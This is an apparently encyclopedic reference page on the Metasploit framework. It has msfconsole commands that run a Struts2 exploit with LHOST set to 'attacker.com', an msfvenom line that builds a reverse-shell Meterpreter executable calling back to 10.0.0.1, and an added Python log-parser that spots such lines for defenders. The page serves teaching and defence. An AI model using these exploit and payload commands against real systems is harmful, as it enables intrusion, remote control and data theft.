Metasploit

Metasploit is a penetration testing framework providing tools for developing, testing, and executing exploits against target systems. It includes a vast database of exploits, payloads, and auxiliary modules.

Core Components

  • Exploits: Code that takes advantage of vulnerabilities
  • Payloads: Code delivered to and run on the target after a successful exploit
  • Auxiliary: Scanning, fuzzing, and enumeration modules
  • Post: Post-exploitation modules
  • Encoders: Payload obfuscation

Basic Usage

# Start Metasploit console
msfconsole

# Search for exploits
msf> search type:exploit apache struts

# Use an exploit
msf> use exploit/multi/http/struts2_content_type_ognl
msf> show options
msf> set RHOSTS target.com
msf> set LHOST attacker.com
msf> exploit

Common Payloads

# Reverse shells
windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp

# Bind shells
windows/shell/bind_tcp

# Generate standalone payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > shell.exe
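
From the defender's side, an msfvenom command line like the one above can be recognised in process-audit or shell-history logs and broken into payload, connection direction, and callback address for triage. This is an added example, not part of the original page or of Metasploit itself; parse_msfvenom and triage are hypothetical helper names, and the sample log lines are constructed.

```python
import shlex

# msfvenom options that take a value (documented flags: -p payload, -f format,
# -o output file, -e encoder, -a architecture).
VALUE_FLAGS = {"-p": "payload", "-f": "format", "-o": "output",
               "-e": "encoder", "-a": "arch"}

def parse_msfvenom(cmdline):
    """Return a dict describing an msfvenom invocation, or None if not one."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in a truncated log line
        tokens = cmdline.split()
    # Locate the msfvenom binary anywhere in the line (sudo, full paths, ...).
    start = next((i for i, t in enumerate(tokens)
                  if t.rsplit("/", 1)[-1] == "msfvenom"), None)
    if start is None:
        return None
    info = {"payload": None, "format": None, "output": None,
            "encoder": None, "arch": None, "options": {}, "direction": "unknown"}
    args = iter(tokens[start + 1:])
    for tok in args:
        if tok in VALUE_FLAGS:
            info[VALUE_FLAGS[tok]] = next(args, None)
        elif tok == ">":                      # shell redirection kept in the log
            info["output"] = next(args, None)
        elif "=" in tok and not tok.startswith("-"):
            key, value = tok.split("=", 1)    # datastore options: LHOST=..., LPORT=...
            info["options"][key.upper()] = value
    last = (info["payload"] or "").rsplit("/", 1)[-1]
    if "reverse_" in last:
        info["direction"] = "reverse"         # target connects out to LHOST:LPORT
    elif "bind_" in last:
        info["direction"] = "bind"            # target listens on LPORT
    return info

# Constructed sample log lines (not from a real incident).
SAMPLE_LOG = [
    "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > shell.exe",
    "/opt/metasploit-framework/bin/msfvenom -p windows/shell/bind_tcp LPORT=5555 -f exe -o b.exe",
    "tar czf backup.tgz /home",
]

def triage(lines):
    """Parse every line and keep only the msfvenom invocations."""
    return [r for r in map(parse_msfvenom, lines) if r is not None]
```

For a reverse payload, the extracted LHOST and LPORT values are the callback address to look for in egress firewall and proxy logs.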

Meterpreter

Meterpreter is an advanced payload that provides an interactive shell with features such as:

  • File system navigation and transfer
  • Process migration
  • Keylogging
  • Screenshot capture
  • Privilege escalation

Versions

  • Framework (OSS): Free, command-line focused
  • Pro: Commercial with GUI and automation
